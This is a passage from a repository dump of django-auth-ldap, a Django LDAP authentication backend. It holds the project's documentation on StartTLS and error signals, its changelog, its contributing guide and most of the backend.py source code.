LDAP connection would be bound as the\nauthenticating user during login requests and as the default credentials during\nother requests, so you might see inconsistent LDAP attributes depending on the\nnature of the Django view. If you're willing to accept the inconsistency in\norder to retrieve attributes while bound as the authenticating user, see\n:setting:`AUTH_LDAP_BIND_AS_AUTHENTICATING_USER`.\n\nBy default, LDAP connections are unencrypted and make no attempt to protect\nsensitive information, such as passwords. When communicating with an LDAP server\non localhost or on a local network, this might be fine. If you need a secure\nconnection to the LDAP server, you can either use an ``ldaps://`` URL or enable\nthe StartTLS extension. The latter is generally the preferred mechanism. To\nenable StartTLS, set :setting:`AUTH_LDAP_START_TLS` to ``True``:\n\n.. code-block:: python\n\n AUTH_LDAP_START_TLS = True\n\nIf :class:`~django_auth_ldap.backend.LDAPBackend` receives an\n:exc:`~ldap.LDAPError` from python_ldap, it will normally swallow it and log a\nwarning. If you'd like to perform any special handling for these exceptions, you\ncan add a signal handler to :data:`django_auth_ldap.backend.ldap_error`. The\nsignal handler can handle the exception any way you like, including re-raising\nit or any other exception.\n" }, { "alpha_fraction": 0.6214092969894409, "alphanum_fraction": 0.6746394634246826, "avg_line_length": 25.653125762939453, "blob_id": "fbc488621700b189526a1e6b321b6ae65ec6837d", "content_id": "4dedf46b100d7dc2280376862167f592bae301a6", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 8531, "license_type": "permissive", "max_line_length": 95, "num_lines": 320, "path": "/docs/changes.rst", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "Change Log\n==========\n\n.. important:: The releases are now tracked using the `GitHub releases\n <https://github.com/django-auth-ldap/django-auth-ldap/releases>`_. The\n following remains for historical purposes.\n\nOld changes\n-----------\n\nBreaking changes\n^^^^^^^^^^^^^^^^\n\n- The signal ``ldap_error`` now has an additional ``request`` keyword argument.\n\n- Added support for Python 3.10.\n- Added support for Django 4.0.\n\n3.0.0 — 2021-07-19\n------------------\n\n- Dropped support for Django 3.0.\n\nBreaking changes\n^^^^^^^^^^^^^^^^\n\n- Dropped deprecated setting ``AUTH_LDAP_CACHE_GROUPS``.\n- Callables passed to ``AUTH_LDAP_SERVER_URI`` must now take a ``request`` positional argument.\n\n2.4.0 - 2021-04-06\n------------------\n\n- Added support for Django 3.2.\n\n2.3.0 - 2021-02-15\n------------------\n\n- Removed support for end of life Django 1.11. django-auth-ldap now requires\n Django 2.2+.\n- Removed support for end of life Python 3.5.\n- Added support for Django 3.1.\n- Added support for Python 3.9.\n- Removed ``dev-requirements.txt`` in favor of :doc:`tox <tox:index>`.\n\n2.2.0 - 2020-06-02\n------------------\n\n- Added support for the escape argument in ``LDAPSearchUnion.execute()``.\n\n2.1.1 - 2020-03-26\n\n- Removed drepecated ``providing_args`` from ``Signal`` instances.\n\n2.1.0 - 2019-12-03\n------------------\n\n- Reject authentication requests without a username.\n- Added support for Django 3.0 and Python 3.8.\n- Removed support for end of life Django 2.1.\n\n2.0.0 - 2019-06-05\n------------------\n\n- Removed support for Python 2 and 3.4.\n- Removed support for end of life Django 2.0.\n- Added support for Django 2.2.\n- Add testing and support for Python 3.7 with Django 1.11 and 2.1.\n- When :setting:`AUTH_LDAP_SERVER_URI` is set to a callable, it is now passed a\n positional ``request`` argument. Support for no arguments will continue for\n backwards compatibility but will be removed in a future version.\n- Added new :setting:`AUTH_LDAP_NO_NEW_USERS` to prevent the creation of new\n users during authentication. Any users not already in the Django user\n database will not be able to login.\n\n1.6.1 - 2018-06-02\n------------------\n\n- Renamed ``requirements.txt`` to ``dev-requirements.txt`` to fix Read the Docs\n build.\n\n1.6.0 - 2018-06-02\n------------------\n\n- Updated ``LDAPBackend.authenticate()`` signature to match Django's\n documentation.\n- Fixed group membership queries with DNs containing non-ascii characters on\n Python 2.7.\n- The setting :setting:`AUTH_LDAP_CACHE_TIMEOUT` now replaces deprecated\n `AUTH_LDAP_CACHE_GROUPS` and `AUTH_LDAP_GROUP_CACHE_TIMEOUT`. In addition to\n caching groups, it also controls caching of distinguished names (which were\n previously cached by default). A compatibility shim is provided so the\n deprecated settings will continue to work.\n\n1.5.0 - 2018-04-18\n------------------\n\n- django-auth-ldap is now hosted at\n https://github.com/django-auth-ldap/django-auth-ldap.\n\n- Removed NISGroupType class. It searched by attribute nisNetgroupTriple, which\n has no defined EQAULITY rule.\n\n- The python-ldap library is now initialized with ``bytes_mode=False``,\n requiring all LDAP values to be handled as Unicode text (``str`` in Python 3\n and ``unicode`` in Python 2), not bytes. For additional information, see the\n python-ldap documentation on :ref:`bytes mode <text-bytes>`.\n\n- Removed deprecated function ``LDAPBackend.get_or_create_user()``. Use\n :meth:`~django_auth_ldap.backend.LDAPBackend.get_or_build_user` instead.\n\n\n1.4.0 - 2018-03-22\n------------------\n\n- Honor the attrlist argument to :setting:`AUTH_LDAP_GROUP_SEARCH`\n\n- **Backwards incompatible**: Removed support for Django < 1.11.\n\n- Support for Python 2.7 and 3.4+ now handled by the same dependency,\n `python-ldap >= 3.0 <https://pypi.org/project/python-ldap/>`_.\n\n\n1.3.0 - 2017-11-20\n------------------\n\n- **Backwards incompatible**: Removed support for obsolete versions of\n Django (<=1.7, plus 1.9).\n\n- Delay saving new users as long as possible. This will allow\n :setting:`AUTH_LDAP_USER_ATTR_MAP` to populate required fields before creating\n a new Django user.\n\n ``LDAPBackend.get_or_create_user()`` is now\n :meth:`~django_auth_ldap.backend.LDAPBackend.get_or_build_user` to avoid\n confusion. The old name may still be overridden for now.\n\n- Support querying by a field other than the username field with\n :setting:`AUTH_LDAP_USER_QUERY_FIELD`.\n\n- New method\n :meth:`~django_auth_ldap.backend.LDAPBackend.authenticate_ldap_user` to\n provide pre- and post-authentication hooks.\n\n- Add support for Django 2.0.\n\n\n1.2.16 - 2017-09-30\n-------------------\n\n- Better cache key sanitizing.\n\n- Improved handling of LDAPError. A case existed where the error would not get\n caught while loading group permissions.\n\n\n1.2.15 - 2017-08-17\n-------------------\n\n- Improved documentation for finding the official repository and contributing.\n\n\n1.2.14 - 2017-07-24\n-------------------\n\n- Under search/bind mode, the user's DN will now be cached for\n performance.\n\n\n1.2.13 - 2017-06-19\n-------------------\n\n- Support selective group mirroring with :setting:`AUTH_LDAP_MIRROR_GROUPS` and\n :setting:`AUTH_LDAP_MIRROR_GROUPS_EXCEPT`.\n\n- Work around Django 1.11 bug with multiple authentication backends.\n\n\n1.2.12 - 2017-05-20\n-------------------\n\n- Support for complex group queries via\n :class:`~django_auth_ldap.config.LDAPGroupQuery`.\n\n\n1.2.11 - 2017-04-22\n-------------------\n\n- Some more descriptive object representations.\n\n- Improved tox.ini organization.\n\n\n1.2.9 - 2017-02-14\n------------------\n\n- Ignore python-ldap documentation and accept ``ldap.RES_SEARCH_ENTRY`` from\n :meth:`ldap.LDAPObject.result`.\n\n\n1.2.8 - 2016-04-18\n------------------\n\n- Add :setting:`AUTH_LDAP_USER_ATTRLIST` to override the set of attributes\n requested from the LDAP server.\n\n\n1.2.7 - 2015-09-29\n------------------\n\n- Support Python 3 with `pyldap <https://pypi.org/project/pyldap/>`_.\n\n\n1.2.6 - 2015-03-29\n------------------\n\n- Performance improvements to group mirroring (from\n `Denver Janke <https://bitbucket.org/denverjanke>`_).\n\n- Add :data:`django_auth_ldap.backend.ldap_error` signal for custom handling of\n :exc:`~ldap.LDAPError` exceptions.\n\n- Add :data:`django_auth_ldap.backend.LDAPBackend.default_settings` for\n per-subclass default settings.\n\n\n1.2.5 - 2015-01-30\n------------------\n\n- Fix interaction between :setting:`AUTH_LDAP_AUTHORIZE_ALL_USERS` and\n :setting:`AUTH_LDAP_USER_SEARCH`.\n\n\n1.2.4 - 2014-12-28\n------------------\n\n- Add support for nisNetgroup groups (thanks to Christopher Bartz).\n\n\n1.2.3 - 2014-11-18\n------------------\n\n- Improved escaping for filter strings.\n\n- Accept (and ignore) arbitrary keyword arguments to\n ``LDAPBackend.authenticate``.\n\n\n1.2.2 - 2014-09-22\n------------------\n\n- Include test harness in source distribution. Some package maintainers find\n this helpful.\n\n\n1.2.1 - 2014-08-24\n------------------\n\n- More verbose log messages for authentication failures.\n\n\n1.2.0 - 2014-04-10\n------------------\n\n- django-auth-ldap now provides experimental Python 3 support. Python 2.5 was\n dropped.\n\n To sum up, django-auth-ldap works with Python 2.6, 2.7, 3.3 and 3.4.\n\n Since python-ldap isn't making progress toward Python 3, if you're using\n Python 3, you need to install a fork:\n\n .. code-block:: bash\n\n $ pip install git+https://github.com/rbarrois/python-ldap.git@py3\n\n Thanks to `Aymeric Augustin <https://myks.org/en/>`_ for making this happen.\n\n\n1.1.8 - 2014-02-01\n------------------\n\n* Update :class:`~django_auth_ldap.config.LDAPSearchUnion` to work for group\n searches in addition to user searches.\n\n* Tox no longer supports Python 2.5, so our tests now run on 2.6 and 2.7 only.\n\n\n1.1.7 - 2013-11-19\n------------------\n\n* Bug fix: :setting:`AUTH_LDAP_GLOBAL_OPTIONS` could be ignored in some cases\n (such as :func:`~django_auth_ldap.backend.LDAPBackend.populate_user`).\n\n\n1.1.5 - 2013-10-25\n------------------\n\n* Support POSIX group permissions with no gidNumber attribute.\n\n* Support multiple group DNs for \\*_FLAGS_BY_GROUP.\n\n\n1.1.4 - 2013-03-09\n------------------\n\n* Add support for Django 1.5's custom user models.\n\n\n1.1.3 - 2013-01-05\n------------------\n\n* Reject empty passwords by default.\n\n Unless :setting:`AUTH_LDAP_PERMIT_EMPTY_PASSWORD` is set to True,\n LDAPBackend.authenticate() will immediately return None if the password is\n empty. This is technically backwards-incompatible, but it's a more secure\n default for those LDAP servers that are configured such that binds without\n passwords always succeed.\n\n* Add support for pickling LDAP-authenticated users.\n" }, { "alpha_fraction": 0.7337461113929749, "alphanum_fraction": 0.7337461113929749, "avg_line_length": 26.685714721679688, "blob_id": "753b60af2e2c6b4fc439c3a8c3d364cb66ee31dc", "content_id": "724acde43a2c432e4e38cf3103f0a078eaed61ed", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 969, "license_type": "permissive", "max_line_length": 83, "num_lines": 35, "path": "/docs/contributing.rst", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "Contributing\n============\n\nIf you'd like to contribute, the best approach is to send a well-formed pull\nrequest, complete with tests and documentation. Pull requests should be\nfocused: trying to do more than one thing in a single request will make it more\ndifficult to process.\n\nIf you have a bug or feature request you can try `logging an issue`_.\n\nThere's no harm in creating an issue and then submitting a pull request to\nresolve it. This can be a good way to start a conversation and can serve as an\nanchor point.\n\n.. _`logging an issue`: https://github.com/django-auth-ldap/django-auth-ldap/issues\n\n\nDevelopment\n-----------\n\nTo run the full test suite in a range of environments, run :doc:`tox <tox:index>`\nfrom the root of the project:\n\n.. code-block:: sh\n\n $ tox\n\nThis includes some static analysis to detect potential runtime errors and style\nissues.\n\nTo limit to a single environment, use :ref:`tox-run--e`:\n\n.. code-block:: console\n\n $ tox -e djangomain\n" }, { "alpha_fraction": 0.588276743888855, "alphanum_fraction": 0.5890117287635803, "avg_line_length": 31.98282814025879, "blob_id": "c064db27f7a5619dc1d587b2fd9dddd797355a4f", "content_id": "fc37ef23d7806238781ad90e7320c2f67d27a37f", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 32653, "license_type": "permissive", "max_line_length": 88, "num_lines": 990, "path": "/django_auth_ldap/backend.py", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "# Copyright (c) 2009, Peter Sagerson\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# - Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n#\n# - Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n\"\"\"\nLDAP authentication backend\n\nDocumentation: https://django-auth-ldap.readthedocs.io/\n\nA few notes on naming conventions. If an identifier ends in _dn, it is a string\nrepresentation of a distinguished name. If it ends in _info, it is a 2-tuple\ncontaining a DN and a dictionary of lists of attributes. ldap.search_s returns a\nlist of such structures. An identifier that ends in _attrs is the dictionary of\nattributes from the _info structure.\n\nA connection is an LDAPObject that has been successfully bound with a DN and\npassword. The identifier 'user' always refers to a User model object; LDAP user\ninformation will be user_dn or user_info.\n\nAdditional classes can be found in the config module next to this one.\n\"\"\"\n\nimport copy\nimport operator\nimport pprint\nimport re\nimport warnings\nfrom functools import reduce\n\nimport django.conf\nimport django.dispatch\nimport ldap\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.models import Group, Permission\nfrom django.core.cache import cache\nfrom django.core.exceptions import ImproperlyConfigured, ObjectDoesNotExist\n\nfrom .config import (\n ConfigurationWarning,\n LDAPGroupQuery,\n LDAPSearch,\n LDAPSettings,\n _LDAPConfig,\n)\n\nlogger = _LDAPConfig.get_logger()\n\n\n# Exported signals\n\n# Allows clients to perform custom user population.\n# Passed arguments: user, ldap_user\npopulate_user = django.dispatch.Signal()\n\n# Allows clients to inspect and perform special handling of LDAPError\n# exceptions. Exceptions raised by handlers will be propagated out.\n# Passed arguments: context, user, exception\nldap_error = django.dispatch.Signal()\n\n\nclass LDAPBackend:\n \"\"\"\n The main backend class. This implements the auth backend API, although it\n actually delegates most of its work to _LDAPUser, which is defined next.\n \"\"\"\n\n supports_anonymous_user = False\n supports_object_permissions = True\n supports_inactive_user = False\n\n _settings = None\n _ldap = None # The cached ldap module (or mock object)\n\n # This is prepended to our internal setting names to produce the names we\n # expect in Django's settings file. Subclasses can change this in order to\n # support multiple collections of settings.\n settings_prefix = \"AUTH_LDAP_\"\n\n # Default settings to override the built-in defaults.\n default_settings = {}\n\n def __getstate__(self):\n \"\"\"\n Exclude certain cached properties from pickling.\n \"\"\"\n return {\n k: v for k, v in self.__dict__.items() if k not in [\"_settings\", \"_ldap\"]\n }\n\n @property\n def settings(self):\n if self._settings is None:\n self._settings = LDAPSettings(self.settings_prefix, self.default_settings)\n\n return self._settings\n\n @settings.setter\n def settings(self, settings):\n self._settings = settings\n\n @property\n def ldap(self):\n if self._ldap is None:\n options = getattr(django.conf.settings, \"AUTH_LDAP_GLOBAL_OPTIONS\", None)\n\n self._ldap = _LDAPConfig.get_ldap(options)\n\n return self._ldap\n\n def get_user_model(self):\n \"\"\"\n By default, this will return the model class configured by\n AUTH_USER_MODEL. Subclasses may wish to override it and return a proxy\n model.\n \"\"\"\n return get_user_model()\n\n #\n # The Django auth backend API\n #\n\n def authenticate(self, request, username=None, password=None, **kwargs):\n if username is None:\n return None\n\n if password or self.settings.PERMIT_EMPTY_PASSWORD:\n ldap_user = _LDAPUser(self, username=username.strip(), request=request)\n user = self.authenticate_ldap_user(ldap_user, password)\n else:\n logger.debug(\"Rejecting empty password for %s\", username)\n user = None\n\n return user\n\n def get_user(self, user_id):\n user = None\n\n try:\n user = self.get_user_model().objects.get(pk=user_id)\n _LDAPUser(self, user=user) # This sets user.ldap_user\n except ObjectDoesNotExist:\n pass\n\n return user\n\n def has_perm(self, user, perm, obj=None):\n return perm in self.get_all_permissions(user, obj)\n\n def has_module_perms(self, user, app_label):\n for perm in self.get_all_permissions(user):\n if perm[: perm.index(\".\")] == app_label:\n return True\n\n return False\n\n def get_all_permissions(self, user, obj=None):\n return self.get_group_permissions(user, obj)\n\n def get_group_permissions(self, user, obj=None):\n if not hasattr(user, \"ldap_user\") and self.settings.AUTHORIZE_ALL_USERS:\n _LDAPUser(self, user=user) # This sets user.ldap_user\n\n if hasattr(user, \"ldap_user\"):\n permissions = user.ldap_user.get_group_permissions()\n else:\n permissions = set()\n\n return permissions\n\n #\n # Bonus API: populate the Django user from LDAP without authenticating.\n #\n\n def populate_user(self, username):\n ldap_user = _LDAPUser(self, username=username)\n return ldap_user.populate_user()\n\n #\n # Hooks for subclasses\n #\n\n def authenticate_ldap_user(self, ldap_user, password):\n \"\"\"\n Returns an authenticated Django user or None.\n \"\"\"\n return ldap_user.authenticate(password)\n\n def get_or_build_user(self, username, ldap_user):\n \"\"\"\n This must return a (User, built) 2-tuple for the given LDAP user.\n\n username is the Django-friendly username of the user. ldap_user.dn is\n the user's DN and ldap_user.attrs contains all of their LDAP\n attributes.\n\n The returned User object may be an unsaved model instance.\n\n \"\"\"\n model = self.get_user_model()\n\n if self.settings.USER_QUERY_FIELD:\n query_field = self.settings.USER_QUERY_FIELD\n query_value = ldap_user.attrs[self.settings.USER_ATTR_MAP[query_field]][0]\n lookup = query_field\n else:\n query_field = model.USERNAME_FIELD\n query_value = username.lower()\n lookup = \"{}__iexact\".format(query_field)\n\n try:\n user = model.objects.get(**{lookup: query_value})\n except model.DoesNotExist:\n user = model(**{query_field: query_value})\n built = True\n else:\n built = False\n\n return (user, built)\n\n def ldap_to_django_username(self, username):\n return username\n\n def django_to_ldap_username(self, username):\n return username\n\n\nclass _LDAPUser:\n \"\"\"\n Represents an LDAP user and ultimately fields all requests that the\n backend receives. This class exists for two reasons. First, it's\n convenient to have a separate object for each request so that we can use\n object attributes without running into threading problems. Second, these\n objects get attached to the User objects, which allows us to cache\n expensive LDAP information, especially around groups and permissions.\n\n self.backend is a reference back to the LDAPBackend instance, which we need\n to access the ldap module and any hooks that a subclass has overridden.\n \"\"\"\n\n class AuthenticationFailed(Exception):\n pass\n\n # Defaults\n _user = None\n _user_dn = None\n _user_attrs = None\n _groups = None\n _group_permissions = None\n _connection = None\n _connection_bound = False\n\n #\n # Initialization\n #\n\n def __init__(self, backend, username=None, user=None, request=None):\n \"\"\"\n A new LDAPUser must be initialized with either a username or an\n authenticated User object. If a user is given, the username will be\n ignored.\n \"\"\"\n self.backend = backend\n self._username = username\n self._request = request\n\n if user is not None:\n self._set_authenticated_user(user)\n\n if username is None and user is None:\n raise Exception(\"Internal error: _LDAPUser improperly initialized.\")\n\n def __deepcopy__(self, memo):\n obj = object.__new__(type(self))\n obj.backend = self.backend\n obj._user = copy.deepcopy(self._user, memo)\n\n # This is all just cached immutable data. There's no point copying it.\n obj._username = self._username\n obj._user_dn = self._user_dn\n obj._user_attrs = self._user_attrs\n obj._groups = self._groups\n obj._group_permissions = self._group_permissions\n\n # The connection couldn't be copied even if we wanted to\n obj._connection = self._connection\n obj._connection_bound = self._connection_bound\n\n return obj\n\n def __getstate__(self):\n \"\"\"\n Most of our properties are cached from the LDAP server. We only want to\n pickle a few crucial things.\n \"\"\"\n return {\n k: v\n for k, v in self.__dict__.items()\n if k in [\"backend\", \"_username\", \"_user\"]\n }\n\n def _set_authenticated_user(self, user):\n self._user = user\n self._username = self.backend.django_to_ldap_username(user.get_username())\n\n user.ldap_user = self\n user.ldap_username = self._username\n\n @property\n def ldap(self):\n return self.backend.ldap\n\n @property\n def settings(self):\n return self.backend.settings\n\n #\n # Entry points\n #\n\n def authenticate(self, password):\n \"\"\"\n Authenticates against the LDAP directory and returns the corresponding\n User object if successful. Returns None on failure.\n \"\"\"\n user = None\n\n try:\n self._authenticate_user_dn(password)\n self._check_requirements()\n self._get_or_create_user()\n\n user = self._user\n except self.AuthenticationFailed as e:\n logger.debug(\"Authentication failed for %s: %s\", self._username, e)\n except ldap.LDAPError as e:\n results = ldap_error.send(\n type(self.backend),\n context=\"authenticate\",\n user=self._user,\n request=self._request,\n exception=e,\n )\n if len(results) == 0:\n logger.warning(\n \"Caught LDAPError while authenticating %s: %s\",\n self._username,\n pprint.pformat(e),\n )\n except Exception as e:\n logger.warning(\"%s while authenticating %s\", e, self._username)\n raise\n\n return user\n\n def get_group_permissions(self):\n \"\"\"\n If allowed by the configuration, this returns the set of permissions\n defined by the user's LDAP group memberships.\n \"\"\"\n if self._group_permissions is None:\n self._group_permissions = set()\n\n if self.settings.FIND_GROUP_PERMS:\n try:\n if self.dn is not None:\n self._load_group_permissions()\n except ldap.LDAPError as e:\n results = ldap_error.send(\n type(self.backend),\n context=\"get_group_permissions\",\n user=self._user,\n request=self._request,\n exception=e,\n )\n if len(results) == 0:\n logger.warning(\n \"Caught LDAPError loading group permissions: %s\",\n pprint.pformat(e),\n )\n\n return self._group_permissions\n\n def populate_user(self):\n \"\"\"\n Populates the Django user object using the default bind credentials.\n \"\"\"\n user = None\n\n try:\n # self.attrs will only be non-None if we were able to load this user\n # from the LDAP directory, so this filters out nonexistent users.\n if self.attrs is not None:\n self._get_or_create_user(force_populate=True)\n\n user = self._user\n except ldap.LDAPError as e:\n results = ldap_error.send(\n type(self.backend),\n context=\"populate_user\",\n user=self._user,\n request=self._request,\n exception=e,\n )\n if len(results) == 0:\n logger.warning(\n \"Caught LDAPError while authenticating %s: %s\",\n self._username,\n pprint.pformat(e),\n )\n except Exception as e:\n logger.warning(\"%s while authenticating %s\", e, self._username)\n raise\n\n return user\n\n #\n # Public properties (callbacks). These are all lazy for performance reasons.\n #\n\n @property\n def dn(self):\n if self._user_dn is None:\n self._load_user_dn()\n\n return self._user_dn\n\n @property\n def attrs(self):\n if self._user_attrs is None:\n self._load_user_attrs()\n\n return self._user_attrs\n\n @property\n def group_dns(self):\n return self._get_groups().get_group_dns()\n\n @property\n def group_names(self):\n return self._get_groups().get_group_names()\n\n @property\n def connection(self):\n if not self._connection_bound:\n self._bind()\n\n return self._get_connection()\n\n #\n # Authentication\n #\n\n def _authenticate_user_dn(self, password):\n \"\"\"\n Binds to the LDAP server with the user's DN and password. Raises\n AuthenticationFailed on failure.\n \"\"\"\n if self.dn is None:\n raise self.AuthenticationFailed(\"failed to map the username to a DN.\")\n\n try:\n sticky = self.settings.BIND_AS_AUTHENTICATING_USER\n\n self._bind_as(self.dn, password, sticky=sticky)\n except ldap.INVALID_CREDENTIALS:\n raise self.AuthenticationFailed(\"user DN/password rejected by LDAP server.\")\n if (\n self._using_simple_bind_mode()\n and sticky\n and self.settings.REFRESH_DN_ON_BIND\n ):\n self._user_dn = self._search_for_user_dn()\n\n def _load_user_attrs(self):\n if self.dn is not None:\n search = LDAPSearch(\n self.dn, ldap.SCOPE_BASE, attrlist=self.settings.USER_ATTRLIST\n )\n results = search.execute(self.connection)\n\n if results is not None and len(results) > 0:\n self._user_attrs = results[0][1]\n\n def _load_user_dn(self):\n \"\"\"\n Populates self._user_dn with the distinguished name of our user.\n\n This will either construct the DN from a template in\n AUTH_LDAP_USER_DN_TEMPLATE or connect to the server and search for it.\n If we have to search, we'll cache the DN.\n\n \"\"\"\n if self._using_simple_bind_mode():\n self._user_dn = self._construct_simple_user_dn()\n else:\n self._user_dn = self._search_for_user_dn()\n\n def _using_simple_bind_mode(self):\n return self.settings.USER_DN_TEMPLATE is not None\n\n def _construct_simple_user_dn(self):\n template = self.settings.USER_DN_TEMPLATE\n username = ldap.dn.escape_dn_chars(self._username)\n return template % {\"user\": username}\n\n def _search_for_user_dn(self):\n \"\"\"\n Searches the directory for a user matching AUTH_LDAP_USER_SEARCH.\n Populates self._user_dn and self._user_attrs.\n \"\"\"\n\n def _search_for_user():\n search = self.settings.USER_SEARCH\n if search is None:\n raise ImproperlyConfigured(\n \"AUTH_LDAP_USER_SEARCH must be an LDAPSearch instance.\"\n )\n\n results = search.execute(self.connection, {\"user\": self._username})\n if results is not None and len(results) == 1:\n (user_dn, self._user_attrs) = next(iter(results))\n else:\n user_dn = None\n\n return user_dn\n\n if self.settings.CACHE_TIMEOUT > 0:\n cache_key = valid_cache_key(\n \"django_auth_ldap.user_dn.{}\".format(self._username)\n )\n return cache.get_or_set(\n cache_key, _search_for_user, self.settings.CACHE_TIMEOUT\n )\n return _search_for_user()\n\n def _check_requirements(self):\n \"\"\"\n Checks all authentication requirements beyond credentials. Raises\n AuthenticationFailed on failure.\n \"\"\"\n self._check_required_group()\n self._check_denied_group()\n\n def _check_required_group(self):\n \"\"\"\n Returns True if the group requirement (AUTH_LDAP_REQUIRE_GROUP) is\n met. Always returns True if AUTH_LDAP_REQUIRE_GROUP is None.\n \"\"\"\n required_group_dn = self.settings.REQUIRE_GROUP\n\n if required_group_dn is not None:\n if not isinstance(required_group_dn, LDAPGroupQuery):\n required_group_dn = LDAPGroupQuery(required_group_dn)\n result = required_group_dn.resolve(self)\n if not result:\n raise self.AuthenticationFailed(\n \"user does not satisfy AUTH_LDAP_REQUIRE_GROUP\"\n )\n\n return True\n\n def _check_denied_group(self):\n \"\"\"\n Returns True if the negative group requirement (AUTH_LDAP_DENY_GROUP)\n is met. Always returns True if AUTH_LDAP_DENY_GROUP is None.\n \"\"\"\n denied_group_dn = self.settings.DENY_GROUP\n\n if denied_group_dn is not None:\n is_member = self._get_groups().is_member_of(denied_group_dn)\n if is_member:\n raise self.AuthenticationFailed(\n \"user does not satisfy AUTH_LDAP_DENY_GROUP\"\n )\n\n return True\n\n #\n # User management\n #\n\n def _get_or_create_user(self, force_populate=False):\n \"\"\"\n Loads the User model object from the database or creates it if it\n doesn't exist. Also populates the fields, subject to\n AUTH_LDAP_ALWAYS_UPDATE_USER.\n \"\"\"\n save_user = False\n\n username = self.backend.ldap_to_django_username(self._username)\n\n self._user, built = self.backend.get_or_build_user(username, self)\n self._user.ldap_user = self\n self._user.ldap_username = self._username\n\n should_populate = force_populate or self.settings.ALWAYS_UPDATE_USER or built\n\n if built:\n if self.settings.NO_NEW_USERS:\n raise self.AuthenticationFailed(\n \"user does not satisfy AUTH_LDAP_NO_NEW_USERS\"\n )\n\n logger.debug(\"Creating Django user %s\", username)\n self._user.set_unusable_password()\n save_user = True\n\n if should_populate:\n logger.debug(\"Populating Django user %s\", username)\n self._populate_user()\n save_user = True\n\n # Give the client a chance to finish populating the user just\n # before saving.\n populate_user.send(type(self.backend), user=self._user, ldap_user=self)\n\n if save_user:\n self._user.save()\n\n # This has to wait until we're sure the user has a pk.\n if self.settings.MIRROR_GROUPS or self.settings.MIRROR_GROUPS_EXCEPT:\n self._normalize_mirror_settings()\n self._mirror_groups()\n\n def _populate_user(self):\n \"\"\"\n Populates our User object with information from the LDAP directory.\n \"\"\"\n self._populate_user_from_attributes()\n self._populate_user_from_group_memberships()\n\n def _populate_user_from_attributes(self):\n for field, attr in self.settings.USER_ATTR_MAP.items():\n try:\n value = self.attrs[attr][0]\n except (TypeError, LookupError):\n # TypeError occurs when self.attrs is None as we were unable to\n # load this user's attributes.\n logger.warning(\n \"%s does not have a value for the attribute %s\", self.dn, attr\n )\n else:\n setattr(self._user, field, value)\n\n def _populate_user_from_group_memberships(self):\n for field, group_dns in self.settings.USER_FLAGS_BY_GROUP.items():\n try:\n query = self._normalize_group_dns(group_dns)\n except ValueError as e:\n raise ImproperlyConfigured(\n \"{}: {}\", self.settings._name(\"USER_FLAGS_BY_GROUP\"), e\n )\n\n value = query.resolve(self)\n setattr(self._user, field, value)\n\n def _normalize_group_dns(self, group_dns):\n \"\"\"\n Converts one or more group DNs to an LDAPGroupQuery.\n\n group_dns may be a string, a non-empty list or tuple of strings, or an\n LDAPGroupQuery. The result will be an LDAPGroupQuery. A list or tuple\n will be joined with the | operator.\n\n \"\"\"\n if isinstance(group_dns, LDAPGroupQuery):\n query = group_dns\n elif isinstance(group_dns, str):\n query = LDAPGroupQuery(group_dns)\n elif isinstance(group_dns, (list, tuple)) and len(group_dns) > 0:\n query = reduce(operator.or_, map(LDAPGroupQuery, group_dns))\n else:\n raise ValueError(group_dns)\n\n return query\n\n def _normalize_mirror_settings(self):\n \"\"\"\n Validates the group mirroring settings and converts them as necessary.\n \"\"\"\n\n def malformed_mirror_groups_except():\n return ImproperlyConfigured(\n \"{} must be a collection of group names\".format(\n self.settings._name(\"MIRROR_GROUPS_EXCEPT\")\n )\n )\n\n def malformed_mirror_groups():\n return ImproperlyConfigured(\n \"{} must be True or a collection of group names\".format(\n self.settings._name(\"MIRROR_GROUPS\")\n )\n )\n\n mge = self.settings.MIRROR_GROUPS_EXCEPT\n mg = self.settings.MIRROR_GROUPS\n\n if mge is not None:\n if isinstance(mge, (set, frozenset)):\n pass\n elif isinstance(mge, (list, tuple)):\n mge = self.settings.MIRROR_GROUPS_EXCEPT = frozenset(mge)\n else:\n raise malformed_mirror_groups_except()\n\n if not all(isinstance(value, str) for value in mge):\n raise malformed_mirror_groups_except()\n elif mg:\n warnings.warn(\n ConfigurationWarning(\n \"Ignoring {} in favor of {}\".format(\n self.settings._name(\"MIRROR_GROUPS\"),\n self.settings._name(\"MIRROR_GROUPS_EXCEPT\"),\n )\n )\n )\n mg = self.settings.MIRROR_GROUPS = None\n\n if mg is not None:\n if isinstance(mg, (bool, set, frozenset)):\n pass\n elif isinstance(mg, (list, tuple)):\n mg = self.settings.MIRROR_GROUPS = 